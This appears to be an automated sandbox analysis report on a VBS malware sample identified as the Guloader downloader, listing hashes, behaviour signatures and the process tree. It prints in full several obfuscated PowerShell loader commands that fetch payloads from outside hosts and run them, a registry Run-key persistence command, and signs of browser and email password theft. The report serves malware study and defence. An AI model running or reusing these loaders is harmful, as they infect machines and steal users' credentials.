Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10-07-2024 14:35
Static task
static1
Behavioral task
behavioral1
Sample
0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs
Resource
win10v2004-20240709-en
General
-
Target
0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs
-
Size
101KB
-
MD5
20d1961bd8aa051dfb5632bf9be3e084
-
SHA1
75aafde8ec0657db8c60570c12620e0b7072f552
-
SHA256
0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2
-
SHA512
3a362c2598bdacbb574b2663fac8679a52f84b158e405c2a44581fe45537e05bf09c2d41bb68848d64c419683810c6fa5bb17d8dd04bdc67ab0c4ef53188534f
-
SSDEEP
3072:p4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvaiIu:Ot7SPReHd0WoT28faa+CS64mu8IQCtv1
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/632-66-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/2980-65-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4568-64-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/632-66-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/2980-65-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid process 10 1192 powershell.exe 41 5088 powershell.exe 43 5088 powershell.exe 45 5088 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\forvrrende = "%Diplococci% -w 1 $Phytosaur=(Get-ItemProperty -Path 'HKCU:\\Bortslbning\\').epidermoid;%Diplococci% ($Phytosaur)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 3616 wab.exe 3616 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 208 powershell.exe 3616 wab.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exewab.exedescription pid process target process PID 208 set thread context of 3616 208 powershell.exe wab.exe PID 3616 set thread context of 2980 3616 wab.exe wab.exe PID 3616 set thread context of 632 3616 wab.exe wab.exe PID 3616 set thread context of 4568 3616 wab.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
wab.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings wab.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
powershell.exepowershell.exewab.exewab.exepowershell.exepowershell.exepid process 1192 powershell.exe 1192 powershell.exe 208 powershell.exe 208 powershell.exe 208 powershell.exe 4568 wab.exe 4568 wab.exe 2980 wab.exe 2980 wab.exe 5088 powershell.exe 5088 powershell.exe 2980 wab.exe 2980 wab.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exewab.exepid process 208 powershell.exe 3616 wab.exe 3616 wab.exe 3616 wab.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exewab.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1192 powershell.exe Token: SeDebugPrivilege 208 powershell.exe Token: SeDebugPrivilege 4568 wab.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeDebugPrivilege 4708 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wab.exepid process 3616 wab.exe -
Suspicious use of WriteProcessMemory 48 IoCs
Processes:
WScript.exepowershell.exepowershell.exewab.execmd.exeWScript.exepowershell.exepowershell.exedescription pid process target process PID 2944 wrote to memory of 1192 2944 WScript.exe powershell.exe PID 2944 wrote to memory of 1192 2944 WScript.exe powershell.exe PID 1192 wrote to memory of 4528 1192 powershell.exe cmd.exe PID 1192 wrote to memory of 4528 1192 powershell.exe cmd.exe PID 1192 wrote to memory of 208 1192 powershell.exe powershell.exe PID 1192 wrote to memory of 208 1192 powershell.exe powershell.exe PID 1192 wrote to memory of 208 1192 powershell.exe powershell.exe PID 208 wrote to memory of 2684 208 powershell.exe cmd.exe PID 208 wrote to memory of 2684 208 powershell.exe cmd.exe PID 208 wrote to memory of 2684 208 powershell.exe cmd.exe PID 208 wrote to memory of 3616 208 powershell.exe wab.exe PID 208 wrote to memory of 3616 208 powershell.exe wab.exe PID 208 wrote to memory of 3616 208 powershell.exe wab.exe PID 208 wrote to memory of 3616 208 powershell.exe wab.exe PID 208 wrote to memory of 3616 208 powershell.exe wab.exe PID 3616 wrote to memory of 2264 3616 wab.exe cmd.exe PID 3616 wrote to memory of 2264 3616 wab.exe cmd.exe PID 3616 wrote to memory of 2264 3616 wab.exe cmd.exe PID 2264 wrote to memory of 2068 2264 cmd.exe reg.exe PID 2264 wrote to memory of 2068 2264 cmd.exe reg.exe PID 2264 wrote to memory of 2068 2264 cmd.exe reg.exe PID 3616 wrote to memory of 3144 3616 wab.exe WScript.exe PID 3616 wrote to memory of 3144 3616 wab.exe WScript.exe PID 3616 wrote to memory of 3144 3616 wab.exe WScript.exe PID 3616 wrote to memory of 2980 3616 wab.exe wab.exe PID 3616 wrote to memory of 2980 3616 wab.exe wab.exe PID 3616 wrote to memory of 2980 3616 wab.exe wab.exe PID 3616 wrote to memory of 2980 3616 wab.exe wab.exe PID 3616 wrote to memory of 632 3616 wab.exe wab.exe PID 3616 wrote to memory of 632 3616 wab.exe wab.exe PID 3616 wrote to memory of 632 3616 wab.exe wab.exe PID 3616 wrote to memory of 632 3616 wab.exe wab.exe PID 3616 wrote to memory of 4568 3616 wab.exe wab.exe PID 3616 wrote to memory of 4568 3616 wab.exe wab.exe PID 3616 wrote to memory of 4568 3616 wab.exe wab.exe PID 3616 wrote to memory of 4568 3616 wab.exe wab.exe PID 3144 wrote to memory of 5088 3144 WScript.exe powershell.exe PID 3144 wrote to memory of 5088 3144 WScript.exe powershell.exe PID 3144 wrote to memory of 5088 3144 WScript.exe powershell.exe PID 5088 wrote to memory of 2440 5088 powershell.exe cmd.exe PID 5088 wrote to memory of 2440 5088 powershell.exe cmd.exe PID 5088 wrote to memory of 2440 5088 powershell.exe cmd.exe PID 5088 wrote to memory of 4708 5088 powershell.exe powershell.exe PID 5088 wrote to memory of 4708 5088 powershell.exe powershell.exe PID 5088 wrote to memory of 4708 5088 powershell.exe powershell.exe PID 4708 wrote to memory of 100 4708 powershell.exe cmd.exe PID 4708 wrote to memory of 100 4708 powershell.exe cmd.exe PID 4708 wrote to memory of 100 4708 powershell.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative';If (${host}.CurrentCulture) {$Lejlighedsdigter++;}Function Valgsted($Reprsentationsudgift){$datasikkerheders=$Reprsentationsudgift.Length-$Lejlighedsdigter;$Achter='SUBsTR';$Achter+='ing';For( $Extratellurian=1;$Extratellurian -lt $datasikkerheders;$Extratellurian+=2){$Tunnellen+=$Reprsentationsudgift.$Achter.Invoke( $Extratellurian, $Lejlighedsdigter);}$Tunnellen;}function Differen($Dilettants){ & ($Bookmakernes) ($Dilettants);}$Bliden=Valgsted ' MSoRzmiGl.l a /T5T. 0. u(,W iMn,d.oMwFs PN T 1 0 .B0 ; W.iHnD6.4D;T WxO6N4G;R BrNvP:A1S2 1B.B0 )S GBe cMkAo./F2e0 1,0 0N1A0e1S JFPi rBeYfgoTx /H1A2S1,.,0 ';$Skridtbeskytteren=Valgsted 'PUHsHe r,- A gFeSn tT ';$Coner=Valgsted 'MhSt t.pIs,:G/D/.eSvEo l,u xIcdoFnStha,bTiBlHi dUaLd eA..cio.m .FbFr,/Fr dB/UG.rMeBeBn l,aTn,dA.SxSt p >NhAtntPp s.:r/,/ eSuPrso - f i eLrP-UvDeWc,h i . rFoL/GG,rNe,e n.lFa n dU.UxPtApA ';$Tjenstlig=Valgsted ' >M ';$Bookmakernes=Valgsted 'Bi.e xR ';$Serioese='Baksning';$Lignitize = Valgsted 'Se c h oO P% a pBpFd,a tMa.%I\UPRlSa,nAf u l n,e sPsC.DDvy,kR ,&J&. SeEc.h,o, tR ';Differen (Valgsted 'G$Sg l o,b a l :.RHeTcSa nTcJeRl e.dB=S(Sc mid R/ c. ,$,LNi.gUnMiUtHiDzVet)N ');Differen (Valgsted ' $.g.lHo bRa lC:KF,o.rEfva t.n iBnDgDsst iSlStbaSg =J$KCGoKn.e r .OsRp l,iAtI(.$ST.j eSn,sLtUl.irg.)D ');Differen (Valgsted 'K[ N,e.t,.USGe rLv iHc.eUP oMi,nStAMMaPn,angLe,r,]H:U:.S.ePcsuNrSiAtAy,PPrDoOt o cMoSl =J .[KNLe t . S.e c uTrPi t.ybPPr,o.tFoFc.oPl T y,pFe ]A: : TGlTs 1,2a ');$Coner=$Forfatningstiltag[0];$Pelt241= (Valgsted 'L$TgEl,oRbda,l :,A nFtBoAn eRl,l.e.s.=HNGe w - OMb jGeBc tP RS.y s,t e mG. N e.t.. W.eKb CmlLi e nwt');$Pelt241+=$Recanceled[1];Differen ($Pelt241);Differen (Valgsted 'A$UAUn.tVoPnre l.l,ePsB.KHAe a dIe,r s,[p$ S k.rBiSdAtMb e sQk y t tEegr,eMn ]g=b$ B lPiPd e n ');$Beskydningen=Valgsted ',$ ATn tKoKnre l lIeDsW.lDtoSwFnNl,oPa dAFTiRl.eI(S$,C oDn e.r ,f$HO.s.n a,bEuDrCg.)l ';$Osnaburg=$Recanceled[0];Differen (Valgsted ' $ gGl o bSa l :SA u t oBmRaSt kVa,fHeB=,( T e s t,-,P astFhT l$JO.s,nAaSbSuEr.gC) ');while (!$Automatkafe) {Differen (Valgsted 'A$ g l oObBa,l :TLHo b e l iAe.rDn.e = $ tFrSuDeA ') ;Differen $Beskydningen;Differen (Valgsted ',S tAaFrRt -.S.l,e,e p ,4F ');Differen (Valgsted ' $,g l oTbDa lD: ACuMtuo m a tJk a fKe = ( T eVs.tF-,P aStTh J$ O s n,a,bDusrBgA)H ') ;Differen (Valgsted 'H$BgUlHo b,aRlA:NS.pGaNl.t eFg r uGphp eNn.s,=L$.gElMo bPa.le:CT iAg hFt.rSoTp eDs 6,+I+ % $lFUo rBf.aSt n i,nEgRsPt,iEl.tGaVg . cAo uGnGt ') ;$Coner=$Forfatningstiltag[$Spaltegruppens];}$Akkomoderet=328490;$Soothest=27621;Differen (Valgsted 'C$ g lSoPbDa lB:DRPeAl,i,g.iMo,n i sCt s = DG,eFt -VC,oRn tReRn t. $ O s.nPaBb u r g ');Differen (Valgsted ' $ gCl.o bWa.l :dV e.j tor e rGnGe 1s5D8S ,= ,[,SDyAs,t,e md. CKo,n vHe rKtH] : :SF rto mHBBaQs,e 6T4FSEt r iSnKgH(G$SR e l.i,g i oMn iBsStRsO) ');Differen (Valgsted 'S$ g.lBo bra.l,: CSaAx iUr i, B=D D[ SSyBs t.e m..LT eKx t .AERnBc oSd i,n g ]D: : AMS.CBI I,.UG ePtPSEt r ijnFg ( $ V eFjVt rPe.r n,e.1I5A8C) ');Differen (Valgsted ' $Hg,l,oDbMaMlL: U.nMp r,o.v aLbSl.y =r$TCna,x.igr.iH.Ts uSbOs.tDrMi nSg,( $NAIkCkDoUmAo.dFeDrDeAtS,e$ SUo oRtShCeSs,t )T ');Differen $Unprovably;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Planfulness.Dyk && echo t"3⤵PID:4528
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative';If (${host}.CurrentCulture) {$Lejlighedsdigter++;}Function Valgsted($Reprsentationsudgift){$datasikkerheders=$Reprsentationsudgift.Length-$Lejlighedsdigter;$Achter='SUBsTR';$Achter+='ing';For( $Extratellurian=1;$Extratellurian -lt $datasikkerheders;$Extratellurian+=2){$Tunnellen+=$Reprsentationsudgift.$Achter.Invoke( $Extratellurian, $Lejlighedsdigter);}$Tunnellen;}function Differen($Dilettants){ & ($Bookmakernes) ($Dilettants);}$Bliden=Valgsted ' MSoRzmiGl.l a /T5T. 0. u(,W iMn,d.oMwFs PN T 1 0 .B0 ; W.iHnD6.4D;T WxO6N4G;R BrNvP:A1S2 1B.B0 )S GBe cMkAo./F2e0 1,0 0N1A0e1S JFPi rBeYfgoTx /H1A2S1,.,0 ';$Skridtbeskytteren=Valgsted 'PUHsHe r,- A gFeSn tT ';$Coner=Valgsted 'MhSt t.pIs,:G/D/.eSvEo l,u xIcdoFnStha,bTiBlHi dUaLd eA..cio.m .FbFr,/Fr dB/UG.rMeBeBn l,aTn,dA.SxSt p >NhAtntPp s.:r/,/ eSuPrso - f i eLrP-UvDeWc,h i . rFoL/GG,rNe,e n.lFa n dU.UxPtApA ';$Tjenstlig=Valgsted ' >M ';$Bookmakernes=Valgsted 'Bi.e xR ';$Serioese='Baksning';$Lignitize = Valgsted 'Se c h oO P% a pBpFd,a tMa.%I\UPRlSa,nAf u l n,e sPsC.DDvy,kR ,&J&. SeEc.h,o, tR ';Differen (Valgsted 'G$Sg l o,b a l :.RHeTcSa nTcJeRl e.dB=S(Sc mid R/ c. ,$,LNi.gUnMiUtHiDzVet)N ');Differen (Valgsted ' $.g.lHo bRa lC:KF,o.rEfva t.n iBnDgDsst iSlStbaSg =J$KCGoKn.e r .OsRp l,iAtI(.$ST.j eSn,sLtUl.irg.)D ');Differen (Valgsted 'K[ N,e.t,.USGe rLv iHc.eUP oMi,nStAMMaPn,angLe,r,]H:U:.S.ePcsuNrSiAtAy,PPrDoOt o cMoSl =J .[KNLe t . S.e c uTrPi t.ybPPr,o.tFoFc.oPl T y,pFe ]A: : TGlTs 1,2a ');$Coner=$Forfatningstiltag[0];$Pelt241= (Valgsted 'L$TgEl,oRbda,l :,A nFtBoAn eRl,l.e.s.=HNGe w - OMb jGeBc tP RS.y s,t e mG. N e.t.. W.eKb CmlLi e nwt');$Pelt241+=$Recanceled[1];Differen ($Pelt241);Differen (Valgsted 'A$UAUn.tVoPnre l.l,ePsB.KHAe a dIe,r s,[p$ S k.rBiSdAtMb e sQk y t tEegr,eMn ]g=b$ B lPiPd e n ');$Beskydningen=Valgsted ',$ ATn tKoKnre l lIeDsW.lDtoSwFnNl,oPa dAFTiRl.eI(S$,C oDn e.r ,f$HO.s.n a,bEuDrCg.)l ';$Osnaburg=$Recanceled[0];Differen (Valgsted ' $ gGl o bSa l :SA u t oBmRaSt kVa,fHeB=,( T e s t,-,P astFhT l$JO.s,nAaSbSuEr.gC) ');while (!$Automatkafe) {Differen (Valgsted 'A$ g l oObBa,l :TLHo b e l iAe.rDn.e = $ tFrSuDeA ') ;Differen $Beskydningen;Differen (Valgsted ',S tAaFrRt -.S.l,e,e p ,4F ');Differen (Valgsted ' $,g l oTbDa lD: ACuMtuo m a tJk a fKe = ( T eVs.tF-,P aStTh J$ O s n,a,bDusrBgA)H ') ;Differen (Valgsted 'H$BgUlHo b,aRlA:NS.pGaNl.t eFg r uGphp eNn.s,=L$.gElMo bPa.le:CT iAg hFt.rSoTp eDs 6,+I+ % $lFUo rBf.aSt n i,nEgRsPt,iEl.tGaVg . cAo uGnGt ') ;$Coner=$Forfatningstiltag[$Spaltegruppens];}$Akkomoderet=328490;$Soothest=27621;Differen (Valgsted 'C$ g lSoPbDa lB:DRPeAl,i,g.iMo,n i sCt s = DG,eFt -VC,oRn tReRn t. $ O s.nPaBb u r g ');Differen (Valgsted ' $ gCl.o bWa.l :dV e.j tor e rGnGe 1s5D8S ,= ,[,SDyAs,t,e md. CKo,n vHe rKtH] : :SF rto mHBBaQs,e 6T4FSEt r iSnKgH(G$SR e l.i,g i oMn iBsStRsO) ');Differen (Valgsted 'S$ g.lBo bra.l,: CSaAx iUr i, B=D D[ SSyBs t.e m..LT eKx t .AERnBc oSd i,n g ]D: : AMS.CBI I,.UG ePtPSEt r ijnFg ( $ V eFjVt rPe.r n,e.1I5A8C) ');Differen (Valgsted ' $Hg,l,oDbMaMlL: U.nMp r,o.v aLbSl.y =r$TCna,x.igr.iH.Ts uSbOs.tDrMi nSg,( $NAIkCkDoUmAo.dFeDrDeAtS,e$ SUo oRtShCeSs,t )T ');Differen $Unprovably;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Planfulness.Dyk && echo t"4⤵PID:2684
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "forvrrende" /t REG_EXPAND_SZ /d "%Diplococci% -w 1 $Phytosaur=(Get-ItemProperty -Path 'HKCU:\Bortslbning\').epidermoid;%Diplococci% ($Phytosaur)"5⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "forvrrende" /t REG_EXPAND_SZ /d "%Diplococci% -w 1 $Phytosaur=(Get-ItemProperty -Path 'HKCU:\Bortslbning\').epidermoid;%Diplococci% ($Phytosaur)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:2068 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Forfrelsens.vbs"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"7⤵PID:2440
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. 